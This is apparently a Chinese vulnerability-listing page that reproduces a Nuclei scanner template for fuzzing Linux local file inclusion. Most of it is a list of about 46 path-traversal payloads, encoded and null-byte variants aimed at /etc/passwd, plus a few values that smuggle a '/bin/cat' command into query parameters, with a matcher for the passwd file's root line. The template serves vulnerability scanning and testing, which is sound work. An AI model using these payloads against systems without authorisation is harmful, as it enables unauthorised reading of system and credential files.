linux-lfi-fuzz: Local File Inclusion - Linux

日期: 2025-08-01 | 影响软件: linux lfi fuzz | POC: 已公开

漏洞描述

PoC代码[已公开]

id: linux-lfi-fuzz

info:
  name: Local File Inclusion - Linux
  author: DhiyaneshDK
  severity: high
  reference:
    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/Intruder/directory_traversal.txt
    - https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion
  metadata:
    max-request: 46
  tags: lfi,dast,linux,vuln

http:
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'

    payloads:
      nix_fuzz:
        low:
          - '/etc/passwd'
          - '../etc/passwd'
          - '../../etc/passwd'
          - '../../../etc/passwd'
          - '/../../../../etc/passwd'
          - '../../../../../../../../../etc/passwd'
          - '../../../../../../../../etc/passwd'
          - '../../../../../../../etc/passwd'
          - '../../../../../../etc/passwd'
          - '../../../../../etc/passwd'
        medium:
          - '../../../../etc/passwd'
          - '../../../etc/passwd'
          - '../../../etc/passwd%00'
          - '../../../../../../../../../../../../etc/passwd%00'
          - '../../../../../../../../../../../../etc/passwd'
          - '/../../../../../../../../../../etc/passwd^^'
          - '/../../../../../../../../../../etc/passwd'
          - '/./././././././././././etc/passwd'
          - '\..\..\..\..\..\..\..\..\..\..\etc\passwd'
          - '..\..\..\..\..\..\..\..\..\..\etc\passwd'
          - '/..\../..\../..\../..\../..\../..\../etc/passwd'
          - '.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd'
          - '\..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
          - '..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
          - '%252e%252e%252fetc%252fpasswd'
        high:
          - '%252e%252e%252fetc%252fpasswd%00'
          - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
          - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00'
          - '....//....//etc/passwd'
          - '..///////..////..//////etc/passwd'
          - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd'
          - '%0a/bin/cat%20/etc/passwd'
          - '%00/etc/passwd%00'
          - '%00../../../../../../etc/passwd'
          - '/../../../../../../../../../../../etc/passwd%00.jpg'
          - '/../../../../../../../../../../../etc/passwd%00.html'
          - '/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd'
          - '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
          - '\\'/bin/cat%20/etc/passwd\\''
          - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
          - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
          - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
          - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
          - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
          - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
          - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
          - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'

    fuzzing:
      - part: query
        type: replace # replaces existing parameter value with fuzz payload
        mode: multiple # replaces all parameters value with fuzz payload
        fuzz:
          - '{{nix_fuzz}}'

    stop-at-first-match: true
    matchers:
      - type: regex
        part: body
        regex:
          - 'root:.*:0:0:'
# digest: 4b0a00483046022100bc2e34d998c161b0f1d7455850d0f9744628335ec5e3d0aeb95ac7711acaa2dd02210093950e9953cf175d3568ef5a82a366ec34486250941957176db44a0aafc24e1b:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/lfi/linux-lfi-fuzz.yaml

相关漏洞推荐